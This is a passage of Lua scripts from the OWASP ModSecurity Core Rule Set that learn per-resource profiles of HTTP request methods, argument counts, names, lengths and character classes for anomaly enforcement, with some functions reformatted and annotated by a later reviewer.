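        m.log(4, "Request Method: " .. RequestMethod .. " profile violation.")
        m.setvar("TX.request_method_violation", "1")
    end
end

--[[
  Compares the number of request arguments with RESOURCE.MinNumOfArgs and
  RESOURCE.MaxNumOfArgs. Outside the range it sets TX.MIN_NUM_ARGS_VIOLATION
  or TX.MAX_NUM_ARGS_VIOLATION to "1" and TX.NUM_OF_ARGS to the count.
  Skipped when no range is stored (the original compared against nil).
]]
function EnforceNumOfArgs()
    local ARGS = m.getvars("ARGS", {"none"}) or {}
    local NumOfArgs = #ARGS
    local MinNumOfArgs = tonumber(m.getvar("RESOURCE.MinNumOfArgs", {"none"}))
    local MaxNumOfArgs = tonumber(m.getvar("RESOURCE.MaxNumOfArgs", {"none"}))

    if MinNumOfArgs == nil or MaxNumOfArgs == nil then
        m.log(4, "No argument count profile available; count check skipped.")
        return
    end

    if NumOfArgs < MinNumOfArgs then
        m.log(4, "Number of ARGS is less than MinNumOfArgs: " .. MinNumOfArgs .. ".")
        m.setvar("TX.MIN_NUM_ARGS_VIOLATION", "1")
        m.setvar("TX.NUM_OF_ARGS", NumOfArgs)
    elseif NumOfArgs > MaxNumOfArgs then
        -- Message fixed: the original printed a garbled variable name here.
        m.log(4, "Number of ARGS is more than MaxNumOfArgs: " .. MaxNumOfArgs .. ".")
        m.setvar("TX.MAX_NUM_ARGS_VIOLATION", "1")
        m.setvar("TX.NUM_OF_ARGS", NumOfArgs)
    else
        m.log(4, "Number of ARGS is within normal range.")
    end
end

-- Archive member: SpiderLabs-owasp-modsecurity-crs-0f07cbb/lua/appsensor_request_exception_profile.lua
function main() --[[ Global Vars ]] --[[ Import Profile Learning Thresholds [resource.min_traffic_threshold] Set the resource.min_traffic_threshold as the minimum number of "clean" transactions to profile/inspect before enforcement of the profile begins.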
[resource.min_pattern_threshold] resource.min_pattern_threshold is the minimum number of times that an individual match should occur in order to include the it into the learned profile ]] MinPatternThreshold = tonumber(m.getvar("RESOURCE.min_pattern_threshold")) MinTrafficThreshold = tonumber(m.getvar("RESOURCE.min_traffic_threshold")) TrafficCounter = m.getvar("RESOURCE.traffic_counter") if TrafficCounter == nil then TrafficCounter = "1" m.setvar("RESOURCE.traffic_counter", TrafficCounter) m.log(4, "Traffic Counter: " ..TrafficCounter.. ".") else TrafficCounter = tonumber(TrafficCounter + 1) m.setvar("RESOURCE.traffic_counter", TrafficCounter) m.log(4, "Traffic Counter: " ..TrafficCounter.. ".") end --[[ Profile Request Method ]] ProfileRequestMethod() --[[ Profile Number of Parameters/ARGS ]] ProfileNumOfArgs() --[[ Profile Parameter Names ]] ProfileArgsNames() --[[ Profile Parameter Lengths ]] ProfileArgsLength() --[[ Profile Parameter Character Class ]] ProfileArgCharClass() if (TrafficCounter == MinTrafficThreshold) then m.setvar("RESOURCE.enforce_re_profile", "1") end m.log(4, "Ending Profile Analyzer Script") return nil end --[[ Begin Profiler Functions ]] function ProfileArgCharClass() local Args = {} Args = m.getvars("ARGS", {"none"}) for k,v in pairs(Args) do name = v["name"]; value = v["value"]; m.log(4, "CharClass Check - Arg Name: " ..name.. " and Value: " ..value.. "."); --[[ Check for Digits Character Class ]] if string.match(value, "^%d+$") then m.log(4, "Parameter " ..name.. " payload matches digit class.") local EnforceArgCharClassDigits = m.getvar("RESOURCE.enforce_charclass_digits") if not (EnforceArgCharClassDigits) then local ArgDigitCounter = m.getvar("RESOURCE." ..name.. "_digit_counter") if not (ArgDigitCounter) then ArgDigitCounter = 1 m.log(4, "Creating " .. name .. " Digit Counter: " .. ArgDigitCounter) m.setvar("RESOURCE." .. name .. "_digit_counter", ArgDigitCounter) else ArgDigitCounter = ArgDigitCounter + 1 m.log(4, "Updating " .. 
name .. " Digit Counter: " .. ArgDigitCounter) m.setvar("RESOURCE." .. name .. "_digit_counter", ArgDigitCounter) end if (ArgDigitCounter == MinPatternThreshold) then if not (EnforceArgCharClassDigits) then EnforceArgCharClassDigits = name else EnforceArgCharClassDigits = EnforceArgCharClassDigits .. ", " .. name end m.log(4, "Arg Name: " .. name .. " Reached Pattern Threshold. Adding it to the Digits Enforcement list: " .. EnforceArgCharClassDigits) m.setvar("RESOURCE.enforce_charclass_digits", EnforceArgCharClassDigits) m.setvar("!RESOURCE." .. name .. "_digit_counter", "0") end else local CheckArgCharClassDigits = string.find(EnforceArgCharClassDigits, name) if (CheckArgCharClassDigits) then m.log(4, "Arg Name: " .. name .. " already in Digits Enforcement list.") else local ArgDigitCounter = m.getvar("RESOURCE." ..name.. "_digit_counter") if not (ArgDigitCounter) then ArgDigitCounter = 1 m.log(4, "Creating " .. name .. " Digit Counter: " .. ArgDigitCounter) m.setvar("RESOURCE." .. name .. "_digit_counter", ArgDigitCounter) else ArgDigitCounter = ArgDigitCounter + 1 m.log(4, "Updating " .. name .. " Digit Counter: " .. ArgDigitCounter) m.setvar("RESOURCE." .. name .. "_digit_counter", ArgDigitCounter) end if (ArgDigitCounter == MinPatternThreshold) then if not (EnforceArgCharClassDigits) then EnforceArgCharClassDigits = name else EnforceArgCharClassDigits = EnforceArgCharClassDigits .. ", " .. name end m.log(4, "Arg Name: " .. name .. " Reached Pattern Threshold. Adding it to the Digits Enforcement list: " .. EnforceArgCharClassDigits) m.setvar("RESOURCE.enforce_charclass_digits", EnforceArgCharClassDigits) end end end if (TrafficCounter == MinTrafficThreshold) then m.setvar("!RESOURCE." .. name .. "_digit_counter", "0") end --[[ Check for Email Class ]] elseif string.match(value, "^[A-Za-z0-9%.%%%+%-]+@[A-Za-z0-9%.%%%+%-]+%.%w%w%w?%w?$") then m.log(4, "Parameter " ..name.. 
" payload matches email class.") local EnforceArgCharClassEmail = m.getvar("RESOURCE.enforce_charclass_email") if not (EnforceArgCharClassEmail) then local ArgEmailCounter = m.getvar("RESOURCE." ..name.. "_email_counter") if not (ArgEmailCounter) then ArgEmailCounter = 1 m.log(4, "Creating " .. name .. " Email Counter: " .. ArgEmailCounter) m.setvar("RESOURCE." .. name .. "_email_counter", ArgEmailCounter) else ArgEmailCounter = ArgEmailCounter + 1 m.log(4, "Updating " .. name .. " Email Counter: " .. ArgEmailCounter) m.setvar("RESOURCE." .. name .. "_email_counter", ArgEmailCounter) end if (ArgEmailCounter == MinPatternThreshold) then if not (EnforceArgCharClassEmail) then EnforceArgCharClassEmail = name else EnforceArgCharClassEmail = EnforceArgCharClassEmail .. ", " .. name end m.log(4, "Arg Name: " .. name .. " Reached Pattern Threshold. Adding it to the Email Enforcement list: " .. EnforceArgCharClassEmail) m.setvar("RESOURCE.enforce_charclass_email", EnforceArgCharClassEmail) end else local CheckArgCharClassEmail = string.find(EnforceArgCharClassEmail, name) if (CheckArgCharClassEmail) then m.log(4, "Arg Name: " .. name .. " already in Email Enforcement list.") else local ArgEmailCounter = m.getvar("RESOURCE." ..name.. "_email_counter") if not (ArgEmailCounter) then ArgEmailCounter = 1 m.log(4, "Creating " .. name .. " Email Counter: " .. ArgEmailCounter) m.setvar("RESOURCE." .. name .. "_email_counter", ArgEmailCounter) else ArgEmailCounter = ArgEmailCounter + 1 m.log(4, "Updating " .. name .. " Email Counter: " .. ArgEmailCounter) m.setvar("RESOURCE." .. name .. "_email_counter", ArgEmailCounter) end if (ArgEmailCounter == MinPatternThreshold) then if not (EnforceArgCharClassEmail) then EnforceArgCharClassEmail = name else EnforceArgCharClassEmail = EnforceArgCharClassEmail .. ", " .. name end m.log(4, "Arg Name: " .. name .. " Reached Pattern Threshold. Adding it to the Email Enforcement list: " .. 
EnforceArgCharClassEmail) m.setvar("RESOURCE.enforce_charclass_email", EnforceArgCharClassEmail) end end end if (TrafficCounter == MinTrafficThreshold) then m.setvar("!RESOURCE." .. name .. "_email_counter", "0") end --[[ Check for URL Class ]] elseif string.match(value, "[A-Za-z]+://[A-Za-z0-9-_]+%.[A-Za-z0-9-_.]+/?") then m.log(4, "Parameter " ..name.. " payload matches url class.") local EnforceArgCharClassUrl = m.getvar("RESOURCE.enforce_charclass_url") if not (EnforceArgCharClassUrl) then local ArgUrlCounter = m.getvar("RESOURCE." ..name.. "_url_counter") if not (ArgUrlCounter) then ArgUrlCounter = 1 m.log(4, "Creating " .. name .. " Url Counter: " .. ArgUrlCounter) m.setvar("RESOURCE." .. name .. "_url_counter", ArgUrlCounter) else ArgUrlCounter = ArgUrlCounter + 1 m.log(4, "Updating " .. name .. " Url Counter: " .. ArgUrlCounter) m.setvar("RESOURCE." .. name .. "_url_counter", ArgUrlCounter) end if (ArgUrlCounter == MinPatternThreshold) then if not (EnforceArgCharClassUrl) then EnforceArgCharClassUrl = name else EnforceArgCharClassUrl = EnforceArgCharClassUrl .. ", " .. name end m.log(4, "Arg Name: " .. name .. " Reached Pattern Threshold. Adding it to the Url Enforcement list: " .. EnforceArgCharClassUrl) m.setvar("RESOURCE.enforce_charclass_url", EnforceArgCharClassUrl) end else local CheckArgCharClassUrl = string.find(EnforceArgCharClassUrl, name) if (CheckArgCharClassUrl) then m.log(4, "Arg Name: " .. name .. " already in Url Enforcement list.") else local ArgUrlCounter = m.getvar("RESOURCE." ..name.. "_url_counter") if not (ArgUrlCounter) then ArgUrlCounter = 1 m.log(4, "Creating " .. name .. " Url Counter: " .. ArgUrlCounter) m.setvar("RESOURCE." .. name .. "_url_counter", ArgUrlCounter) else ArgUrlCounter = ArgUrlCounter + 1 m.log(4, "Updating " .. name .. " Url Counter: " .. ArgUrlCounter) m.setvar("RESOURCE." .. name .. 
"_url_counter", ArgUrlCounter) end if (ArgUrlCounter == MinPatternThreshold) then if not (EnforceArgCharClassUrl) then EnforceArgCharClassUrl = name else EnforceArgCharClassUrl = EnforceArgCharClassUrl .. ", " .. name end m.log(4, "Arg Name: " .. name .. " Reached Pattern Threshold. Adding it to the Url Enforcement list: " .. EnforceArgCharClassUrl) m.setvar("RESOURCE.enforce_charclass_url", EnforceArgCharClassUrl) end end end if (TrafficCounter == MinTrafficThreshold) then m.setvar("!RESOURCE." .. name .. "_url_counter", "0") end --[[ Check for Path Class ]] elseif string.match(value, "[-a-zA-Z0-9/._]*/[-a-zA-Z0-9/._]*") then m.log(4, "Parameter " ..name.. " payload matches path class.") local EnforceArgCharClassPath = m.getvar("RESOURCE.enforce_charclass_path") if not (EnforceArgCharClassPath) then local ArgPathCounter = m.getvar("RESOURCE." ..name.. "_path_counter") if not (ArgPathCounter) then ArgPathCounter = 1 m.log(4, "Creating " .. name .. " Path Counter: " .. ArgPathCounter) m.setvar("RESOURCE." .. name .. "_path_counter", ArgPathCounter) else ArgPathCounter = ArgPathCounter + 1 m.log(4, "Updating " .. name .. " Path Counter: " .. ArgPathCounter) m.setvar("RESOURCE." .. name .. "_path_counter", ArgPathCounter) end if (ArgPathCounter == MinPatternThreshold) then if not (EnforceArgCharClassPath) then EnforceArgCharClassPath = name else EnforceArgCharClassPath = EnforceArgCharClassPath .. ", " .. name end m.log(4, "Arg Name: " .. name .. " Reached Pattern Threshold. Adding it to the Path Enforcement list: " .. EnforceArgCharClassPath) m.setvar("RESOURCE.enforce_charclass_path", EnforceArgCharClassPath) end else local CheckArgCharClassPath = string.find(EnforceArgCharClassPath, name) if (CheckArgCharClassPath) then m.log(4, "Arg Name: " .. name .. " already in Path Enforcement list.") else local ArgPathCounter = m.getvar("RESOURCE." ..name.. "_path_counter") if not (ArgPathCounter) then ArgPathCounter = 1 m.log(4, "Creating " .. name .. " Path Counter: " .. 
ArgPathCounter) m.setvar("RESOURCE." .. name .. "_path_counter", ArgPathCounter) else ArgPathCounter = ArgPathCounter + 1 m.log(4, "Updating " .. name .. " Path Counter: " .. ArgPathCounter) m.setvar("RESOURCE." .. name .. "_path_counter", ArgPathCounter) end if (ArgPathCounter == MinPatternThreshold) then if not (EnforceArgCharClassPath) then EnforceArgCharClassPath = name else EnforceArgCharClassPath = EnforceArgCharClassPath .. ", " .. name end m.log(4, "Arg Name: " .. name .. " Reached Pattern Threshold. Adding it to the Path Enforcement list: " .. EnforceArgCharClassPath) m.setvar("RESOURCE.enforce_charclass_path", EnforceArgCharClassPath) end end end if (TrafficCounter == MinTrafficThreshold) then m.setvar("!RESOURCE." .. name .. "_path_counter", "0") end --[[ Check for Flag Parameter Class ]] elseif string.match(value, "^$") then m.log(4, "Parameter " ..name.. " payload matches flag parameter class.") local EnforceArgCharClassFlag = m.getvar("RESOURCE.enforce_charclass_flag") if not (EnforceArgCharClassFlag) then local ArgFlagCounter = m.getvar("RESOURCE." ..name.. "_flag_counter") if not (ArgFlagCounter) then ArgFlagCounter = 1 m.log(4, "Creating " .. name .. " Flag Counter: " .. ArgFlagCounter) m.setvar("RESOURCE." .. name .. "_flag_counter", ArgFlagCounter) else ArgFlagCounter = ArgFlagCounter + 1 m.log(4, "Updating " .. name .. " Flag Counter: " .. ArgFlagCounter) m.setvar("RESOURCE." .. name .. "_flag_counter", ArgFlagCounter) end if (ArgFlagCounter == MinPatternThreshold) then if not (EnforceArgCharClassFlag) then EnforceArgCharClassFlag = name else EnforceArgCharClassFlag = EnforceArgCharClassFlag .. ", " .. name end m.log(4, "Arg Name: " .. name .. " Reached Pattern Threshold. Adding it to the Flag Enforcement list: " .. EnforceArgCharClassFlag) m.setvar("RESOURCE.enforce_charclass_flag", EnforceArgCharClassFlag) end else local CheckArgCharClassFlag = string.find(EnforceArgCharClassFlag, name) if (CheckArgCharClassFlag) then m.log(4, "Arg Name: " .. 
name .. " already in Flag Enforcement list.") else local ArgFlagCounter = m.getvar("RESOURCE." ..name.. "_flag_counter") if not (ArgFlagCounter) then ArgFlagCounter = 1 m.log(4, "Creating " .. name .. " Flag Counter: " .. ArgFlagCounter) m.setvar("RESOURCE." .. name .. "_flag_counter", ArgFlagCounter) else ArgFlagCounter = ArgFlagCounter + 1 m.log(4, "Updating " .. name .. " Flag Counter: " .. ArgFlagCounter) m.setvar("RESOURCE." .. name .. "_flag_counter", ArgFlagCounter) end if (ArgFlagCounter == MinPatternThreshold) then if not (EnforceArgCharClassFlag) then EnforceArgCharClassFlag = name else EnforceArgCharClassFlag = EnforceArgCharClassFlag .. ", " .. name end m.log(4, "Arg Name: " .. name .. " Reached Pattern Threshold. Adding it to the Flag Enforcement list: " .. EnforceArgCharClassFlag) m.setvar("RESOURCE.enforce_charclass_flag", EnforceArgCharClassFlag) end end end if (TrafficCounter == MinTrafficThreshold) then m.setvar("!RESOURCE." .. name .. "_flag_counter", "0") end --[[ Check for Alpha/Letters Character Class ]] elseif string.match(value, "^%a+$") then m.log(4, "Parameter " ..name.. " payload matches alpha class.") local EnforceArgCharClassAlpha = m.getvar("RESOURCE.enforce_charclass_alphas") if not (EnforceArgCharClassAlpha) then local ArgAlphaCounter = m.getvar("RESOURCE." ..name.. "_alpha_counter") if not (ArgAlphaCounter) then ArgAlphaCounter = 1 m.log(4, "Creating " .. name .. " Alpha Counter: " .. ArgAlphaCounter) m.setvar("RESOURCE." .. name .. "_alpha_counter", ArgAlphaCounter) else ArgAlphaCounter = ArgAlphaCounter + 1 m.log(4, "Updating " .. name .. " Alpha Counter: " .. ArgAlphaCounter) m.setvar("RESOURCE." .. name .. "_alpha_counter", ArgAlphaCounter) end if (ArgAlphaCounter == MinPatternThreshold) then if not (EnforceArgCharClassAlpha) then EnforceArgCharClassAlpha = name else EnforceArgCharClassAlpha = EnforceArgCharClassAlpha .. ", " .. name end m.log(4, "Arg Name: " .. name .. " Reached Pattern Threshold. 
Adding it to the Alpha Enforcement list: " .. EnforceArgCharClassAlpha) m.setvar("RESOURCE.enforce_charclass_alphas", EnforceArgCharClassAlpha) m.setvar("!RESOURCE." .. name .. "_alpha_counter", "0") end else local CheckArgCharClassAlpha = string.find(EnforceArgCharClassAlpha, name) if (CheckArgCharClassAlpha) then m.log(4, "Arg Name: " .. name .. " already in Alpha Enforcement list.") else local ArgAlphaCounter = m.getvar("RESOURCE." ..name.. "_alpha_counter") if not (ArgAlphaCounter) then ArgAlphaCounter = 1 m.log(4, "Creating " .. name .. " Alpha Counter: " .. ArgAlphaCounter) m.setvar("RESOURCE." .. name .. "_alpha_counter", ArgAlphaCounter) else ArgAlphaCounter = ArgAlphaCounter + 1 m.log(4, "Updating " .. name .. " Alpha Counter: " .. ArgAlphaCounter) m.setvar("RESOURCE." .. name .. "_alpha_counter", ArgAlphaCounter) end if (ArgAlphaCounter == MinPatternThreshold) then if not (EnforceArgCharClassAlpha) then EnforceArgCharClassAlpha = name else EnforceArgCharClassAlpha = EnforceArgCharClassAlpha .. ", " .. name end m.log(4, "Arg Name: " .. name .. " Reached Pattern Threshold. Adding it to the Alpha Enforcement list: " .. EnforceArgCharClassAlpha) m.setvar("RESOURCE.enforce_charclass_alphas", EnforceArgCharClassAlpha) end end end if (TrafficCounter == MinTrafficThreshold) then m.setvar("!RESOURCE." .. name .. "_alpha_counter", "0") end --[[ Check for AlphaNumeric Character Class ]] elseif string.match(value, "^%w+$") then m.log(4, "Parameter " ..name.. " payload matches alphanumeric class.") local EnforceArgCharClassAlphaNumeric = m.getvar("RESOURCE.enforce_charclass_alphanumeric") if not (EnforceArgCharClassAlphaNumeric) then local ArgAlphaNumericCounter = m.getvar("RESOURCE." ..name.. "_alphanumeric_counter") if not (ArgAlphaNumericCounter) then ArgAlphaNumericCounter = 1 m.log(4, "Creating " .. name .. " AlphaNumeric Counter: " .. ArgAlphaNumericCounter) m.setvar("RESOURCE." .. name .. 
"_alphanumeric_counter", ArgAlphaNumericCounter) else ArgAlphaNumericCounter = ArgAlphaNumericCounter + 1 m.log(4, "Updating " .. name .. " AlphaNumeric Counter: " .. ArgAlphaNumericCounter) m.setvar("RESOURCE." .. name .. "_alphanumeric_counter", ArgAlphaNumericCounter) end if (ArgAlphaNumericCounter == MinPatternThreshold) then if not (EnforceArgCharClassAlphaNumeric) then EnforceArgCharClassAlphaNumeric = name else EnforceArgCharClassAlphaNumeric = EnforceArgCharClassAlphaNumeric .. ", " .. name end m.log(4, "Arg Name: " .. name .. " Reached Pattern Threshold. Adding it to the AlphaNumeric Enforcement list: " .. EnforceArgCharClassAlphaNumeric) m.setvar("RESOURCE.enforce_charclass_alphanumeric", EnforceArgCharClassAlphaNumeric) m.setvar("!RESOURCE." .. name .. "_alphanumeric_counter", "0") end else local CheckArgCharClassAlphaNumeric = string.find(EnforceArgCharClassAlphaNumeric, name) if (CheckArgCharClassAlphaNumeric) then m.log(4, "Arg Name: " .. name .. " already in AlphaNumeric Enforcement list.") else local ArgAlphaNumericCounter = m.getvar("RESOURCE." ..name.. "_alphanumeric_counter") if not (ArgAlphaNumericCounter) then ArgAlphaNumericCounter = 1 m.log(4, "Creating " .. name .. " AlphaNumeric Counter: " .. ArgAlphaNumericCounter) m.setvar("RESOURCE." .. name .. "_alphanumeric_counter", ArgAlphaNumericCounter) else ArgAlphaNumericCounter = ArgAlphaNumericCounter + 1 m.log(4, "Updating " .. name .. " AlphaNumeric Counter: " .. ArgAlphaNumericCounter) m.setvar("RESOURCE." .. name .. "_alphanumeric_counter", ArgAlphaNumericCounter) end if (ArgAlphaNumericCounter == MinPatternThreshold) then if not (EnforceArgCharClassAlphaNumeric) then EnforceArgCharClassAlphaNumeric = name else EnforceArgCharClassAlphaNumeric = EnforceArgCharClassAlphaNumeric .. ", " .. name end m.log(4, "Arg Name: " .. name .. " Reached Pattern Threshold. Adding it to the AlphaNumeric Enforcement list: " .. 
EnforceArgCharClassAlphaNumeric) m.setvar("RESOURCE.enforce_charclass_alphanumeric", EnforceArgCharClassAlphaNumeric) end end end if (TrafficCounter == MinTrafficThreshold) then m.setvar("!RESOURCE." .. name .. "_alphanumeric_counter", "0") end --[[ Check for SafeText Character Class ]] elseif string.match(value, "^[a-zA-Z0-9%s_%.%-]+$") then m.log(4, "Parameter " ..name.. " payload matches safetext class.") local EnforceArgCharClassSafeText = m.getvar("RESOURCE.enforce_charclass_safetext") if not (EnforceArgCharClassSafeText) then local ArgSafeTextCounter = m.getvar("RESOURCE." ..name.. "_safetext_counter") if not (ArgSafeTextCounter) then ArgSafeTextCounter = 1 m.log(4, "Creating " .. name .. " SafeText Counter: " .. ArgSafeTextCounter) m.setvar("RESOURCE." .. name .. "_safetext_counter", ArgSafeTextCounter) else ArgSafeTextCounter = ArgSafeTextCounter + 1 m.log(4, "Updating " .. name .. " SafeText Counter: " .. ArgSafeTextCounter) m.setvar("RESOURCE." .. name .. "_safetext_counter", ArgSafeTextCounter) end if (ArgSafeTextCounter == MinPatternThreshold) then if not (EnforceArgCharClassSafeText) then EnforceArgCharClassSafeText = name else EnforceArgCharClassSafeText = EnforceArgCharClassSafeText .. ", " .. name end m.log(4, "Arg Name: " .. name .. " Reached Pattern Threshold. Adding it to the SafeText Enforcement list: " .. EnforceArgCharClassSafeText) m.setvar("RESOURCE.enforce_charclass_safetext", EnforceArgCharClassSafeText) end else local CheckArgCharClassSafeText = string.find(EnforceArgCharClassSafeText, name) if (CheckArgCharClassSafeText) then m.log(4, "Arg Name: " .. name .. " already in SafeText Enforcement list.") else local ArgSafeTextCounter = m.getvar("RESOURCE." ..name.. "_safetext_counter") if not (ArgSafeTextCounter) then ArgSafeTextCounter = 1 m.log(4, "Creating " .. name .. " SafeText Counter: " .. ArgSafeTextCounter) m.setvar("RESOURCE." .. name .. 
"_safetext_counter", ArgSafeTextCounter) else ArgSafeTextCounter = ArgSafeTextCounter + 1 m.log(4, "Updating " .. name .. " SafeText Counter: " .. ArgSafeTextCounter) m.setvar("RESOURCE." .. name .. "_safetext_counter", ArgSafeTextCounter) end if (ArgSafeTextCounter == MinPatternThreshold) then if not (EnforceArgCharClassSafeText) then EnforceArgCharClassSafeText = name else EnforceArgCharClassSafeText = EnforceArgCharClassSafeText .. ", " .. name end m.log(4, "Arg Name: " .. name .. " Reached Pattern Threshold. Adding it to the SafeText Enforcement list: " .. EnforceArgCharClassSafeText) m.setvar("RESOURCE.enforce_charclass_safetext", EnforceArgCharClassSafeText) end end end if (TrafficCounter == MinTrafficThreshold) then m.setvar("!RESOURCE." .. name .. "_safetext_counter", "0") end end end end function ProfileArgsLength() local ArgsLength = {} ArgsLength = m.getvars("ARGS", {"none", "length"}) for k,v in pairs(ArgsLength) do name = v["name"]; value = v["value"]; m.log(4, "Arg Name: " ..name.. " and Length: " ..value.. "."); local EnforceArgLength = m.getvar("RESOURCE.enforce_" ..name .. "_length") if EnforceArgsLength ~= nil then local CheckArgsLength = string.find(EnforceArgLength, value) if (CheckArgsLength) then m.log(4, "Arg Name: " .. name .. " with Length: :" ..value.. " already in Enforcement list.") else local ArgLengthCounter = m.getvar("RESOURCE." .. name .. "_length_" ..value.. "_counter") if not (ArgLengthCounter) then ArgLengthCounter = 1 m.log(4, "Creating " .. name .. " Length " ..value.. " Counter: " .. ArgLengthCounter) m.setvar("RESOURCE." .. name .. "_length_" ..value.. "_counter", ArgLengthCounter) else ArgLengthCounter = ArgLengthCounter + 1 m.log(4, "Increasing " .. name .. " Length " .. value .. " Counter: " .. ArgLengthCounter) m.setvar("RESOURCE." .. name .. "_length_" ..value.. 
"_counter", ArgLengthCounter) end if (ArgLengthCounter == MinPatternThreshold) then if not (EnforceArgLength) then EnforceArgLength = value else EnforceArgLength = EnforceArgLength .. ", " .. value end m.log(4, "Arg Name: " .. name .. " with Length: " .. value .. " Reached Pattern Threshold. Adding it to the Enforcement list: " .. EnforceArgLength) m.setvar("RESOURCE.enforce_" ..name .. "_length", EnforceArgLength) end end else local ArgLengthCounter = m.getvar("RESOURCE." .. name .. "_length_" ..value.. "_counter") if not (ArgLengthCounter) then ArgLengthCounter = 1 m.log(4, "Creating " .. name .. " Length " ..value.. " Counter: " .. ArgLengthCounter) m.setvar("RESOURCE." .. name .. "_length_" ..value.. "_counter", ArgLengthCounter) else ArgLengthCounter = ArgLengthCounter + 1 m.log(4, "Increasing " .. name .. " Length " .. value .. " Counter: " .. ArgLengthCounter) m.setvar("RESOURCE." .. name .. "_length_" ..value.. "_counter", ArgLengthCounter) end if (ArgLengthCounter == MinPatternThreshold) then if not (EnforceArgLength) then EnforceArgLength = value else EnforceArgLength = EnforceArgLength .. ", " .. value end m.log(4, "Arg Name: " .. name .. " with Length: " .. value .. " Reached Pattern Threshold. Adding it to the Enforcement list: " .. EnforceArgLength) m.setvar("RESOURCE.enforce_" ..name.. "_length", EnforceArgLength) end end if (TrafficCounter == MinTrafficThreshold) then i=1 length_of_arg={} for num in string.gmatch(EnforceArgLength, "%d+") do length_of_arg[i]=num;i=i+1; end local MinArgLength = math.min(unpack(length_of_arg)) m.setvar("RESOURCE." .. name .. "_length_min", MinArgLength) local MaxArgLength = math.max(unpack(length_of_arg)) m.setvar("RESOURCE." .. name .. "_length_max", MaxArgLength) m.log(4, "Min Length of " .. name .. ": " ..MinArgLength.. " and Max Length: " ..MaxArgLength.. ".") m.setvar("!RESOURCE." .. name .. "_length_" ..value.. 
"_counter", "0") end end end function ProfileArgsNames() local ArgsNames = {} ArgsNames = m.getvars("ARGS_NAMES", {"none"}) local EnforceArgsNames = m.getvar("RESOURCE.enforce_args_names") for k,v in pairs(ArgsNames) do name = v["name"]; value = v["value"]; m.log(4, "ArgsName: " ..value.. "."); if EnforceArgsNames ~= nil then local CheckArgsNames = string.find(EnforceArgsNames, value) if (CheckArgsNames) then m.log(4, "Arg Name: " .. value .. " already in Enforcement list.") else local ArgsNamesCounter = m.getvar("RESOURCE.args_names_counter_" .. value) if not (ArgsNamesCounter) then ArgsNamesCounter = 1 m.log(4, "Creating " .. value .. " Pattern Score: " .. ArgsNamesCounter) m.setvar("RESOURCE.args_names_counter_" .. value, ArgsNamesCounter) else ArgsNamesCounter = ArgsNamesCounter + 1 m.log(4, "Increasing " .. value .. " Pattern Score to: " .. ArgsNamesCounter) m.setvar("RESOURCE.args_names_counter_" .. value, ArgsNamesCounter) end if (ArgsNamesCounter == MinPatternThreshold) then if not (EnforceArgsNames) then EnforceArgsNames = value else EnforceArgsNames = EnforceArgsNames .. ", " .. value end m.log(4, "Args Names: " .. value .. " Reached Pattern Threshold. Adding it to the Enforcement list: " .. EnforceArgsNames) m.setvar("RESOURCE.enforce_args_names", EnforceArgsNames) m.setvar("!RESOURCE.args_names_counter_" .. value, "0") end end else local ArgsNamesCounter = m.getvar("RESOURCE.args_names_counter_" .. value) if not (ArgsNamesCounter) then ArgsNamesCounter = 1 m.log(4, "Creating " .. value .. " Pattern Score: " .. ArgsNamesCounter) m.setvar("RESOURCE.args_names_counter_" .. value, ArgsNamesCounter) else ArgsNamesCounter = ArgsNamesCounter + 1 m.log(4, "Increasing " .. value .. " Pattern Score to: " .. ArgsNamesCounter) m.setvar("RESOURCE.args_names_counter_" .. value, ArgsNamesCounter) end if (ArgsNamesCounter == MinPatternThreshold) then if not (EnforceArgsNames) then EnforceArgsNames = value else EnforceArgsNames = EnforceArgsNames .. ", " .. 
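value end m.log(4, "Args Names: " .. value .. " Reached Pattern Threshold. Adding it to the Enforcement list: " .. EnforceArgsNames) m.setvar("RESOURCE.enforce_args_names", EnforceArgsNames) m.setvar("!RESOURCE.args_names_counter_" .. value, "0") end end end end

-- Returns true when `item` is exactly one of the ", "-separated entries of
-- `list` (the format the enforcement lists below are written in).
--
-- The comparison is a literal, whole-entry match. The original code called
-- string.find(list, item), which treats `item` as a Lua pattern and matches
-- substrings: "1" was reported as present in "10, 12", and request-derived
-- text containing pattern metacharacters could raise a pattern error.
local function EnforcementListContains(list, item)
  if list == nil or item == nil then
    return false
  end
  local wanted = tostring(item)
  for entry in string.gmatch(tostring(list), "[^,]+") do
    local trimmed = string.match(entry, "^%s*(.-)%s*$")
    if trimmed == wanted then
      return true
    end
  end
  return false
end

-- Learns which HTTP request methods are seen for the current resource.
--
-- Reads REQUEST_METHOD, bumps RESOURCE.request_method_counter_<method> and,
-- when that counter equals MinPatternThreshold, appends the method to
-- RESOURCE.enforce_request_methods. When TrafficCounter equals
-- MinTrafficThreshold the per-method counter is reset through the
-- "!RESOURCE..." setvar form.
--
-- MinPatternThreshold, TrafficCounter and MinTrafficThreshold are globals
-- that are not defined in this part of the file.
-- NOTE(review): the counter is a number when compared, so the threshold
-- globals are presumably numbers too - confirm where they are assigned.
function ProfileRequestMethod()
  local RequestMethod = m.getvar("REQUEST_METHOD", {"none"})
  if RequestMethod == nil then
    -- Nothing to profile; the original would fail on the concatenations below.
    return
  end

  local EnforceRequestMethods = m.getvar("RESOURCE.enforce_request_methods")
  local AlreadyEnforced = EnforcementListContains(EnforceRequestMethods, RequestMethod)
  if AlreadyEnforced then
    m.log(4, "Request Method " .. RequestMethod .. " already in Enforcement List.")
  end

  local CounterKey = "RESOURCE.request_method_counter_" .. RequestMethod
  local StoredCounter = m.getvar(CounterKey)
  local RequestMethodCounter = tonumber(StoredCounter)
  if not RequestMethodCounter then
    RequestMethodCounter = 1
    m.log(4, "Creating " .. RequestMethod .. " Pattern Score: " .. RequestMethodCounter)
  else
    RequestMethodCounter = RequestMethodCounter + 1
    m.log(4, "Increasing " .. RequestMethod .. " Pattern Score to: " .. RequestMethodCounter)
  end
  m.setvar(CounterKey, RequestMethodCounter)

  if (RequestMethodCounter == MinPatternThreshold) then
    -- Do not append a method that is already listed (avoids duplicates
    -- after the counter has been reset and reaches the threshold again).
    if not AlreadyEnforced then
      if not (EnforceRequestMethods) then
        EnforceRequestMethods = RequestMethod
      else
        EnforceRequestMethods = EnforceRequestMethods .. ", " .. RequestMethod
      end
    end
    m.log(4, "Request Method Reached Pattern Threshold. Adding it to the EnforceRequestMethods list: " .. EnforceRequestMethods)
    m.setvar("RESOURCE.enforce_request_methods", EnforceRequestMethods)
  end

  if (TrafficCounter == MinTrafficThreshold) then
    m.setvar("!RESOURCE.request_method_counter_" .. RequestMethod, "0")
  end
end

-- Learns how many arguments requests to the current resource carry.
--
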